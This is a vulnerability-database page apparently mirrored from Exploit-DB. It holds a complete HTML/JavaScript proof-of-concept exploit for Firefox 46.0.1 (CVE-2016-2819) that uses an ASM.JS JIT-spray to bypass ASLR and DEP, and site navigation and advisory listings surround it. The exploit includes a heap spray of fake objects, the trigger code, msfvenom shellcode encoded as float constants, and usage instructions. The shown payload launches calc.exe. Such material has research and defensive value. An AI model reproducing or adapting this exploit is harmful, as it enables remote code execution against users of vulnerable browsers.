Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution

🗓️ 16 Mar 2018 00:00:00Reported by Rh0Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 60 Views

CVE-2016-2819 and ASM.JS JIT-Spray exploit for Firefox 46.0.1 on Windows 1

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit
15 Jul 201700:00
zdt
0day.today		Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution Exploit
17 Mar 201800:00
zdt
0day.today		Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit
17 Mar 201800:00
zdt
IBM Security Bulletins		Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified
18 Jun 201800:33
ibm
IBM Security Bulletins		Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM SONAS
18 Jun 201800:33
ibm
IBM Security Bulletins		Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM SONAS
18 Jun 201800:28
ibm
IBM Security Bulletins		Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified.
18 Jun 201800:28
ibm
FreeBSD		mozilla -- multiple vulnerabilities
7 Jun 201600:00
freebsd
FreeBSD		mozilla -- multiple vulnerabilities
24 Jan 201700:00
freebsd
Tenable Nessus		Mozilla Firefox ESR < 45.2 Multiple Vulnerabilities
24 Jun 201600:00
nessus
Rows per page
<!DOCTYPE HTML>

<!--

    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018

    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe

    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successfull exploit attempt should pop calc.exe

    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381


    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/


    - For research purposes only -
    
    (C) Rh0

    Mar. 13, 2018

-->

<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"

var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}

Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x5a500000 

    /* target address of asm.js float pool payload*/
    var target_eip = 0x20200b58

    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1000)

    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)

    /* go! */
    this.trigger_vuln(node_target_addr)
};


Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="BBBB">'
    this.heap.gc()
    var a = new Array() 
    for (var i=0; i < 0x10100; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr 
    }

    /* original crashing testcase
    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'
    */

    /* easier to exploit codepath */
    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'

    window.location.reload()
};


var Asmjs = function(){};

Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
            -1.587865768352248e-263,
            -8.692422460804815e-255,
            7.529882109376901e-114,
            2.0120602207293977e-16,
            3.7204662687249914e-242,
            4.351158092040946e+89,
            2.284741716118451e+270,
            7.620699014501263e-153,
            5.996021286047645e+44,
            -5.981935902612295e-92,
            6.23540918304361e+259,
            1.9227873281657598e+256,
            2.0672493951546363e+187,
            -6.971032919585734e+91,
            5.651413300798281e-134,
            -1.9040061366251406e+305,
            -1.2687640718807038e-241,
            9.697849844423e-310,
            -2.0571400761625145e+306,
            -1.1777948610587587e-123,
            2.708909852013898e+289,
            3.591750823735296e+37,
            -1.7960516725035723e+106,
            6.326776523166028e+180
        )
        return +val;
    }
    return payload
};

Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};

var Heap = function(target_addr, eip){
    this.node_heap = []
};


Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x20000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29 
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip 
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};

Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};

</script>
<head>
<body onload='exploit = new Exploit(); exploit.go()' />

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Mar 2018 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 39.8
EPSS0.64664
asm.js jit-sprayfirefox 46.0.1windows 10remote code executionfull aslrdep bypasscve-2017-5375offensivecon 2018bugzilla mozillarh0mar. 13 2018
60